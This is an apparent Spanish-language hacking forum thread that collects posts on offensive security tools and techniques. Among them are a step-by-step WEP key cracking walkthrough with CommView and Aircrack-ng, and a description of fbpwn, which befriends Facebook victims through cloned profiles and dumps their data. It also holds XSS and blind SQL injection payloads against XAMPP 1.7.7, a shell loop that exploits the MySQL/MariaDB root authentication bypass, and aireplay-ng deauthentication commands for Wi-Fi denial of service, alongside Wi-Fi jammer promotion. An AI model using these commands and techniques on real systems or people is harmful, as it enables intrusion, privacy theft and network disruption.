RIPS es un escaner de seguridad para encontrar vulnerabilidades en aplicaciones PHP a través del análisis estático de código. "Tokenizando" y analizando todos los archivos de código fuente, RIPS es capaz de transformar el código PHP origen en un modelo de programa y detectar los sinks sensibles (funciones potencialmente vulnerables) que pueden ser contaminadas por la entrada del usuario durante el flujo de la aplicación (influenciado por un usuario malicioso).


Además de la salida estructurada de las vulnerabilidades encontradas, RIPS también ofrece un marco de código de auditoría integrada para el análisis manual posterior.

Interfaz de auditoría de código:

- Escaneo de vulnerabilidades y estadísticas (XSS, SQLi, descubrimiento de ficheros, LFI/RFI, RCE y más)
- Agrupación de líneas de código vulnerables (de abajo a arriba o de arriba hacia abajo)
- Descripción de vulnerabilidades con ejemplos de código, PoC, creador de parches de exploits
- Lista de archivos y gráficos (conectados por includes)
- Lista de funciones y gráficos (conectados por calls)
- Lista de entradas de usuario (parámetros de la aplicación)
- Visor de código fuente con resaltado de sintaxis
- Saltos activos entre llamadas a funciones
- Búsqueda en el código mediante expresiones regulares
- 8 diseños de resaltado de sintaxis.

WebSite: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

fbpwn es una herramienta multi-plataforma echa en java que construye un framework de ingeniería social para Facebook (en adelante FB), capaz de enviar solicitudes de amistad a una lista de perfiles y esperar las notificaciones de respuesta. Una vez que la víctima acepta la invitación, vuelca toda su información, fotos y lista de amigos en una carpeta local.

Un escenario típico de hacking con esta herramienta comienza con la recopilación de información de un perfil de usuario de FB. Los plugins son sólo una serie de operaciones normales en FB, automatizados para aumentar la probabilidad de obtención de información.

Normalmente, primero se crea una nueva cuenta en blanco para probar. A continuación, el plugin 'friending' añade todos los amigos de la víctima (para tener algunos amigos comunes). Entonces el complemento clonar nos pedirá que elijamos a uno de los amigos de la víctima. Este plugin de clonación sólo copia la imagen y el nombre para mostrar del amigo de la víctima elegida y lo configura para la cuenta autenticada. Después, se envía una solicitud de amigo a la cuenta de la víctima. Un dumper espera a que la víctima acepte la solicitud de amigo para empezar a guardar todas las páginas HTML accesibles (información, imágenes, etiquetas, etc ...) para un posterior análisis.

Después de unos minutos, puede que la víctima se percate de que la cuenta es falsa y la elimine de su lista de amigos, ¡pero es probable que sea demasiado tarde!


WebSite: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Programas a utilizar:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login -> CommView for WiFi
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login -> Aircrack-ng 1.1 para Windows

Ahora estamos listos para empezar, instalamos CommView con nuestro driver correspondiente, a veces es un poco complicado este paso, Google y YouTube te ayudaran!
Una vez abierto nos vamos a "Logging" y cambiamos

"Maximum directory size, MBytes" a 50000
"Average log file size, MBytes" a 100
"Save logs to" a la carpeta que nosotros deseemos


Una vez hecho esto, nos vamos al botón más grande (Play) el cual abre una ventana llamada "Scanner" entonces hacemos clic en "Start Scanning" esperamos un rato a que realice el escáner por todos los canales.


Dejamos que capture bastantes paquetes de el canal 1 que es en el que está situado nuestra propia red, como no tenemos prisa, lo podemos dejar un rato.

NOTA: Si hay mas señal de red va mas rápido capturando paquetes, así, que si os podéis acercar mucho mejor!
Cuando han pasado 7 minutos vemos que ya ha capturado suficientes paquetes (78.902) hacemos clic en "Stop" automáticamente se guardan en la carpeta que hemos especificado anteriormente, en mi caso "D:\Projects\WIFI KEYS\Files"


Abrimos D:\Projects\WIFI KEYS\Files y vemos que se ha creado un archivo con el día de hoy y la hora


Al ejecutarlo, se nos abre CommView for Wifi hacemos clic en Archivo>Exportar Logs>WireShark/TcpDump Format y lo guardamos con la extensión .cap



Una vez guardado, nos vamos a aircrack-ng 1.1 para windows, en mi caso ya lo he desempaquetado y dentro de la carpeta, abrimos la carpeta "bin" y ejecutamos el archivo "Aircrack-ng GUI.exe"


Una vez abierto escogemos el archivo .cap que anteriormente habíamos guardado, seleccionamos "key size=64″ y "Launch", si falla por este motivo subid del key size a 128.


Entonces no pide que red queremos escoger, y le decimos que la 1ra en la lista:


Entonces dejamos que haga su trabajo.


¿¿Pero qué ha ocurrido??


No hemos esperado el tiempo necesario para que capturara suficientes paquetes (en CommView) como para conseguir la clave, entonces lo que haremos será repetir el procedimiento de captura desde los pasos anteriores hasta llegar otra vez aquí hasta que no nos diga que faltan paquetes.


Ya esta hemos encontrado la clave: C2:40:6C:54:FA ahora solo hemos de quitar los puntos y listo!
KEY: C2406C54FA
NOTA: Esta WiFi es propia así que no se ha hecho nada ilegal!
Aunque parezca largo, es un proceso que puedes realizar en pocos minutos si has hecho una buena captura de paquetes. La verdad es que se puede simplificar en pocos pasos:

Abrir "CommView for WiFi"
Escanear Wifis > Capturar canal
Capturar paquetes del canal
Ir a la carpeta especificada, abrir el archivo generado.
Archivo>Exportar Registros>Wireshark, guardar con extension .cap
Abrir Aircrack-ng Gui.exe dentro de la carpeta bin
Buscar los archivos anteriormente guardados y seleccionarlos (extension .cap)
¡Y ya tenemos la clave!

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

jeje , pero seria muy bueno que publicaras tu paper Antrax, para complementar el Post.

DroidSheep es una sencilla herramienta de Android para el secuestro de sesión Web (sidejacking). Se escucha paquetes HTTP enviados a través de una conexión de red inalámbrica (802.11) y extrae el identificador de sesión a partir de estos paquetes con el fin de reutilizarlos.

DroidSheep puede capturar sesiones utilizando la biblioteca libpcap y soportes: redes WEP abierto redes encriptadas con WPA y WPA2 (PSK redes cifradas solamente)

DroidSheep no está diseñado para robar identidades o cualquiera endamage, sino para mostrar la debilidad de la seguridad de la no-ssl servicios web.


Este software utiliza libpcap y arpspoof.

WebSite: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Maltego es una aplicación de minería y recolección de información utilizada durante la fase de 'Data Gathering', proceso en el cual se trata de obtener el mayor número de información posible sobre un objetivo para su posterior ataque.

Antes de empezar a utilizar Maltego, es necesario registrarse en la web, ya que cuando se inicie Maltego por primera vez, nos pedirá que introduzcamos nuestra cuenta de usuario a través de un asistente. Si no realizamos estos pasos, no se nos cargará la paleta de entidades, por lo que no podremos utilizar adecuadamente el software.

Para iniciar un nuevo proyecto (Graph), se debe hacer clic sobre el icono marcado en la siguiente captura de pantalla.


En el lateral izquierdo de la interfaz, se encuentra un panel con la paleta de componentes. Para agregar una entidad desde esta paleta, basta con arrastrarlo al 'Graph'. En la siguiente captura se ve como se ha agregado una entidad 'Domain'.

Si hacemos clic sobre la entidad una vez agregada, en el lateral derecho se nos mostrará el panel de propiedades, pudiendo personalizar y modificar las propiedades del mismo. Para este ejemplo se ha configurado la propiedad 'Domain Name' como 'fbi.gov'.


Para iniciar el proceso de minería de datos, hay que comenzar con la recogida de información sobre una entidad. Para ello es necesario hacer clic derecho sobre la misma, y expandir el menú 'Run transform', donde aparecerá una lista con las distintas transformaciones aplicables a dicha entidad.

Si dejamos el puntero del ratón situado encima de una de ellas, se nos mostrará una pequeña descripción sobre ella.

Una vez se inicie la búsqueda, se irá pintando el mapa de los datos obtenidos. Dicho mapa será representado mediante diferentes iconos dependiendo del tipo de entidad de que se trate. Por supuesto, cada una dispondrá de sus propias transformaciones.


Una vez se aplique la transformación, se inicirá la búsqueda, y a medida que esta se ejecuta y devuelve resultados, se irá pintando el mapa con los datos obtenidos. Dicho mapa será representado mediante diferentes iconos dependiendo del tipo de entidad que se trate, y cada una dispondrá, por tanto, de sus propias transformaciones.


Una parte importante, a la hora de realizar un proceso de 'Data Gathering', es la identificación de los usuarios de la organización objetivo. Dicha información puede resultar de gran utilidad a la hora de realizar ataques, ya sean bien de ingeniería social, o bien datos que se utilicen para la generación de diccionarios de usuarios, creando de este modo una lista de usuarios válidos en la organización.

Con este objetivo existe una transformación llamada 'Email Addresses from Domain -> All in this set', que intenta obtener un mapa similar al que se puede ver en la siguiente imagen:


Con todas estas direcciones de correos se puede obtener más información, como por ejemplo obtener los dominios en los cuales ha sido encontradas referencias a una dirección de correo concreta. Esto puede encontrar foros, relaciones de comunicación entre empresas, datos publicados en blogs, frecuencias de visita de usuarios, etc... para la realizacion de ataques dirigidos.

En este caso, para probar esta transformación se realizará una búsqueda sobre la dirección de correo '[email protected]', usando la transformación 'Other transformation -> To Website'.


Como se puede ver en la imagen 6, esta cuenta aparece relacionada con distintos servidores web.

En casos en los que se conozca información extra que Maltego ha sido incapaz de encontrar o relacionar, podemos hacer esto manualmente. Si por ejemplo se supiera de la existencia de la cuenta 'usuario @fbi.gov', se puede agregar manualmente arrastrando la entidad 'Email Address' y, posteriormente, creando un enlace con el dominio, símplemente arrastrando desde la entidad dominio hacia la dirección de correo.


Otra de las funcionalidades de Maltego es la extracción de metadatos de los documentos ofimáticos. Para ello, primero es necesaria la localización de dichos documentos mediante la transformación 'Files and Documents from Domain -> To Files (Office)', en este caso realizado sobre el dominio 'usal.es'.


Para la extracción de metadatos, utilizar la transformación 'Other transforms -> Parse meta information' sobre los documentos ofimáticos, obteniendo así los datos.


Una vez está realizada la extracción y relación de datos, es posible visualizarla de diversas formas graficas (Mining view, Dynamic View, Edge Weighter View) o en modo texto (Entity List), seleccionando el tipo en la parte superior del gráfico.


Como se ha podido ver en este artículo, Maltego es una herramienta perfecta para hacer Data Gathering usando repositorios de conocimiento gratuitos en Internet. Una herramienta perfecta para acompañar cualquier proceso de pentesting en la fase de footprinting o fingerprinting e, incluso, cuando se quiera ir a hacer un ataque dirigido en la de exploiting.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Maltego Web Site: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

bueno en tu lugar si intentado con las opciones que te han propuesto mis colegas, y no has encontrado alguna solucion al mismo. y tienes tantas ganas de conocer a BackTrack, por que no lo pruebas con VMware Workstation. ahi no creo que tengas un problema te dejo los link de descarga del programa:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Pd: si sabes como instalarlo o iniciarlo desde la imagen .iso bien por ti, pero sino bajate la imagen de backtrack Image Type: VMWare
luego lo secomprimes y lo abres con VMWare.

Saludos

En muchas ocasiones llegamos a lugares en los cuales la conexión a internet se da de manera cableada y nos encontramos con el problema de que solo hay un puerto de conexión y necesitamos dar conexión a varios PC y no tenemos un Switches, un AP o cualquier dispositivo destinado para compartir conexiones. Esto es más común de lo que creemos, pero afortunadamente hay una manera fácil y sencilla de solucionar este inconveniente, se trata de Virtual WiFi, una característica que se ha incorporado en el sistema operativo Windows 7, la cual nos permite convertir nuestra tarjeta de red inalámbrica en un AP para compartir la conexión a internet de otra interfaz de nuestro PC, solo depende de que nuestra tarjeta de red inalámbrica soporte ésta característica.

Primero que todo, debemos saber si nuestra tarjeta de red inalámbrica soporta esta característica

1.- tenemos que abrir la consola con privilegios de administrado y escribir los siguientes comandos:

netsh wlan set hosednetwork mode=allow ssid=underc0de key=Aryenal keyUsage=persistent
netsh wlan start hostednetwork

*Los parámetros ssid y Key son los del nombre de la red inalámbrica y el password de acceso respectivamente. asi que cada uno le pone el ssid y key que desea.
*el parametro start inicia el adaptador

2.- Si deseamos también compartir Internet, debemos activar una opción en nuestro adaptador que esta conectado a Internet.



y acá les dejo las opciones de los parámetros y ejemplos que pueden utilizar.


Para ver la confguración de la red y los usuarios conectados: netsh wlan show hostednetworkSaludos
Para ver la configuracion de seguridad de la red, incluyendo la clave de conexión y la seguridad, que es WPA2-CCMP (AES):
netsh wlan show hostednetwork security
Para detener el adaptador virtual: netsh wlan stop hostednetwork

Saludos.

Gracias por tu aporte.

Ola Stiuvert podrias colocar el codigo completo. Gracias.

tremendo aporte, la verdad yo tampoco sabia que el ataque Man in the Middle se pudiera realizar en ese rango.
Saludos

Cocoa Packet Analyzer es un sniffer nativo para Mac OS X (>10.5) que desde noviembre de 2011 se encuentra en su versión 1.11.  Entre sus características permite leer y escribir ficheros en PCAP, lo que realmente no es ninguna novedad, y algunos protocolos básicos de TCP/IP.

Adicionalmente es mejorado mediante plugins, de los que hay disponibles tan solo dos: SIP y IAX2

Al arrancarlo permite leer de un fichero un captura o crear una nueva, indicando el interfaz por el que realizar la escucha.


Cuando termina (y no en tiempo real), muestra los resultados en una ventana similar a Wireshark. Aunque como se puede ver en la siguiente captura de pantalla, no permite seguir el flujo de una conexión, ni entiende protocolos de capa 7.


Pese a que visualmente se agradece que esté desarrollado nativamente, las funcionalidades son extremadamente limitadas. Aun está demasiado verde como para plantearse sustituir otros sniffers mucho más avanzados como Wireshark o incluso el propio tcpdump.

Esperemos que continúen ampliandolo y ya veremos dentro de un tiempo si está algo más maduro.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

si tu cuenta no ha tenido actividad como hace desde 1 año como así lo indicas, y ademas como añades en tu post no te acuerdas de los detalles que te pide el soporte de Windows Live, me parece que se te complican las cosas.

Gracias por traerlos, se ven muy buenos.
Saludos

Como sabemos XAMPP es un servidor de plataforma independiente, software libre, que consiste principalmente en una base de datos MySQL, el servidor web Apache y los intérpretes para lenguajes de script: PHP y Perl, perfecto para una rápida instalación de un mini-servidor en nuestro localhost. Recientemente en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login han subido un paper con 2 XSS y 1 Blind SQL Injection...

La versión afectada es XAMPP Windows 1.7.7, y como justamente lo tengo instalado (es la última versión oficial de XAMPP) fue que probé los bugs... Y en efecto era vulnerable:

Vulnerabilidades XSS:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login"<script>alert("XSS")</script>
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Este de arriba, todavía no se arregla desde la versión 1.7.4

Blind SQL Injection:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login and sleep(1) &titel=555-666-0606

Como dije arriba, XAMPP Windows 1.7.7 es la útlima versión oficial, así que la recomendación es que esperes la actualización y que lo desactives si tienes mucha información de importancia.

Fuente: [Blackploit]

El sábado 9 de Junio  Sergei Golubchik, coordinador de seguridad de MariaDB publicaba un post en la lista OSS-SEC sobre una grave vulnerabilidad que afectaba a diferentes versiones de MySQL y MariaDB.

Se evidencia la posibilidad de autenticarse como usuario con máximos privilegios (root) únicamente realizando conexiones simultáneas, con CUALQUIER contraseña introducida como parámetro y contra un servidor vulnerable. Al cabo de un número indeterminado de intentos fallidos, el servidor aceptará la conexión y se realizará la autenticación de forma satisfactoria. Sin más. Sin shellcodes raras, sin casuísticas extrañas: únicamente tenemos que tener delante un servidor vulnerable, que cumpla con las siguientes versiones:

Son vulnerables todas las versiones de MariaDB y MySQL hasta la 5.1.61, 5.2.11, 5.3.5 y 5.5.22
NO SON vulnerables las versiones de MySQL 5.1.63, 5.5.24 y 5.6.6
NO SON vulnerables las versiones de MariaDB 5.1.62, 5.2.12, 5.3.6 y 5.5.23

Con la siguiente línea en shell script, teniendo instalada una base de datos vulnerable en el sistema local, y contando con el cliente 'mysql', se podría realizar una autenticación como usuario root sin conocer la contraseña:

for i in `seq 1 1000`; do mysql -u root --password=blablabla -h 127.0.0.1 2>/dev/null; done

Básicamente, se ejecutará la sentencia de autenticación mediante cliente por consola (comando mysql) como usuario root (-u root) y cualquier contraseña (--password=blablabla) contra el servidor vulnerable  presente en el mismo sistema donde se ejecuta este script (-h 127.0.0.1), sin mostrar ningún mensaje de error por pantalla (2>/dev/null).

Vamos a ver el ejemplo real. Las siguientes pruebas se han realizado sobre una Fedora Core 16, con MySQL versión 5.5.21:


En primer lugar, y para este ejemplo, cambiaremos la contraseña original de MySQL para el usuario root, que antes la teníamos establecida a 'password', para que ahora sea 'SuperPassWordDeLaMuerte':


Seguidamente, salimos de la sesión de root, y nos quedamos como usuario sin privilegios, y ejecutamos la secuencia anterior, que realizará conexiones como usuario root y cualquier contraseña, programando un total de 1000 intentos. A continuación se ejecutará la consola de mysql satisfactoriamente:


Obviamente, este "ataque" ya se encuentra integrado como exploit de Metasploit Framework, permitiendo además el volcado de hashes de todos los usuarios, todo ello con el módulo mysql_authbypass_hashdump:


Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Es un script bash para lanzar un suave AP, puede configurar con una amplia variedad de opciones de ataque. Incluye una serie de index.html y el servidor de scripts php, puede actuar como multi-cliente de portal cautivo con php y iptables. Lanza hazañas clásicas como el mal-PDF.


Va a hacer mucho más que la base aérea de lanzamiento-ng:

- gestión de las interfaces y MACspoofing
- configurar olfateando
- servir a las páginas web de phishing o malicioso
- poner en marcha karmetasploit
- apoderarse de apretones de manos WPA
- de-auth clientes
- gestión de IPtables

Característica de Actualización de lista:

- en cautividad portal con iptables y php
- secuencias de comandos más de PHP
- hazañas añadido

Link: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Gracias por el dato CalebBucker.

1.- INHIBIDOR: Un Inhibidor de Señales Wifi es auqella herramienta fisica cuyo fin es la de hacer nulas las conexiones en una determinada Zona.

VEREMOS ALGUNOS INHIBIDORES PARA SEÑALES WIFI:





sin duda tienen muy buena pinta y son muy discretos.
Pag:  You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

2.-DoS

Cuando se quiere realizar un ataque DoS a una Red Wi-fi, se puede atacar de 2 formas, una es atacando al punto de acceso y dejar sin acceso a ningún cliente o atacando solamente a un cliente en específico.

* ponemos nuestra tarjeta en modo monitor.

airmon-ng start wlan0

* Revisamos el canal del Punto de acceso y ponemos en modo monitor en ese canal en específico.

airmon-ng -c 5 mon0

Donde 5 es el canal del punto de acceso y mon0 es la interfaz en modo monitor.

* DoS al punto de acceso:
Con aireplay enviamos paquetes de deautenticación en un buncle infinito (-0 0) al Punto de acceso.

aireplay-ng -0 0 -a 99:99:99:99:99:99 mon0

Donde 99:99:99:99:99:99 es la mac del Punto de acceso.

* DoS al Cliente:
Con aireplay enviamos paquetes de deautenticación en un buncle infinito (-0 0) a un cliente en específico.

aireplay-ng -0 0 -a 99:99:99:99:99:99 -c 11:11:11:11:11:11 mon0

Donde 99:99:99:99:99:99 es la mac del Punto de acceso y 11:11:11:11:11:11 es la mac del Cliente.

Si esto no les pareció lo suficientemente fácil, Abdulla Aleid realizo un pequeño script que automatiza todo este proceso, pero es un poco más efectivo ya que envia solo 100 paquetes de deautenticación, pero con un loop infinito que sobrecarga aun más la red Wi-fi:

tambien puedes realizar algo similar con mdk3 que esta por defecto en bakctrack 5r3 y kali linux

Fuentes: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos.
(modificado por aika falta del script)

muy buena herramienta, gracias por traerla al foro. y lo mejor es que tambien esta disponible para windows.